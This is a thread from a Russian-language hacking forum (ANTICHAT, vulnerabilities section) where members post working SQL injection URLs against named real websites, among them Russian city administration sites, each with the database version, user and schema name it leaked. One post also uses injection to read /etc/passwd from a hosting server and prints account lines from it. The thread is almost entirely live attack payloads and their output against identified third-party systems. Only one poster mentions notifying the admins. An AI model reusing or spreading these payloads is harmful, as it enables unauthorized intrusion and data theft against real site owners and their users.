HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15991  
Старый 11.02.2015, 23:23
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://www.kanda.com/readnews.php?id=-17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10--
5.5.30:kanda@ikona.biz:kanda_kandadb
 
Ответить с цитированием

  #15992  
Старый 13.02.2015, 18:44
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию



Код:
Code:
http://plugring.farmanager.com/author.php?aid=-9+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14--
plugring@localhostlugring:5.5.41-0ubuntu0.14.04.1

Админы оповещены.
 
Ответить с цитированием

  #15993  
Старый 13.02.2015, 18:59
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от MaxFast  
MaxFast said:

Код:
Code:
http://plugring.farmanager.com/author.php?aid=-9+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14--
plugring@localhostlugring:5.5.41-0ubuntu0.14.04.1
Админы оповещены.
Баянчик

Пруфлинк /showpost.php?p=2483739&postcount=13493

Но оставим, другой сценарий.
 
Ответить с цитированием

  #15994  
Старый 14.02.2015, 00:21
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://actachemscand.dk/author.php?aid=-1126+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4--
5.1.63-0ubuntu0.11.04.1:acta@localhost:acta 4
 
Ответить с цитированием

  #15995  
Старый 14.02.2015, 08:38
palec2006
Guest
Сообщений: n/a
Провел на форуме:
9263

Репутация: 8
По умолчанию

Цитата:
Сообщение от None  
http://www.sportzone.ru/total/table.html?id=148+and+extractvalue(1,concat(0x3a,( version())))and+1=1
Тотализатор

ТИЦ:50

ЯК

кило трафа

в браузере редиректит
 
Ответить с цитированием

  #15996  
Старый 14.02.2015, 11:33
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://www.team221.com/order.php?cat=-3+union+select+concat_ws(0x3a,version(),user(),database())--
 
Ответить с цитированием

  #15997  
Старый 14.02.2015, 16:34
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию



Код:
Code:
http://rockbay.ru/category/1?order_brend=1+and+extractvalue(1,concat(0x3a,(select+concat(version(),0x3a,database(),0x3a,user()))))--
5.5.41-0ubuntu0.12.04.1:rockbay

Официальный сайт администрации города Ноябрьск

Код:
Code:
http://admnoyabrsk.ru/onenews.php?kat=-2211+UNION+ALL+SELECT 1,CONCAT(version(),0x3a,database(),0x3a,user())--&news=389
5.1.41-log:admnoyabrs_db:admnoyabrs_mysql@10.1.117.115

Администрация городского округа — город Волжский

Код:
Code:
http://www.admvol.ru/TopNews/podrobno.asp?id=5'+or+1=@@version--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
 
Ответить с цитированием

  #15998  
Старый 15.02.2015, 14:24
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от None  
http://www.deenakastor.com/recipe_print.php?num=6' and 999999.9 union all select 1,2,concat(version(),0x3a,user()),4,5 and '1'='1
5.5.32-log:deenakastor@10.1.112.62
 
Ответить с цитированием

  #15999  
Старый 15.02.2015, 15:45
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию

Цитата:
Сообщение от None  
http://smart-elec.ru/noo.php?page1=506&page2=42&razdel=5&info=-163'+union+select+'
../../../../../../../../../../../../etc/hosts
',concat(version(),0x3a,user())+--+
5.5.35-33.0

u0967474_smart@localhost

Ситауация схожа с с третьим видео

и ещё одна

Цитата:
Сообщение от None  
http://www.footystatcenter.com/center/index.php?userid=2747&lang=6+union+select+1,2,conc at(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2 e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)+--+
под хексом /etc/passwd

Смотрим тег title

Цитата:
Сообщение от None  
gold6583:*:9812875:100450:gold6583:/home/content/75/9812875:/sbin/nologin
suzanneriver:*:6698633:100450:suzanneriver:/home/content/33/6698633:/sbin/nologin
optienz:*:6022630:100450
ptienz:/home/content/30/6022630:/sbin/nologin
ursu2587:*:10016686:100450:ursu2587:/home/ *********
 
Ответить с цитированием

  #16000  
Старый 16.02.2015, 16:08
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Код:
Code:
http://www.aaa-agro.com/news/536.html'*updatexml(1,concat(0x3A,version()),1)*'
Вывод в алерте

5.5.41-0ubuntu0.12.04
 
Ответить с цитированием
Ответ





Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ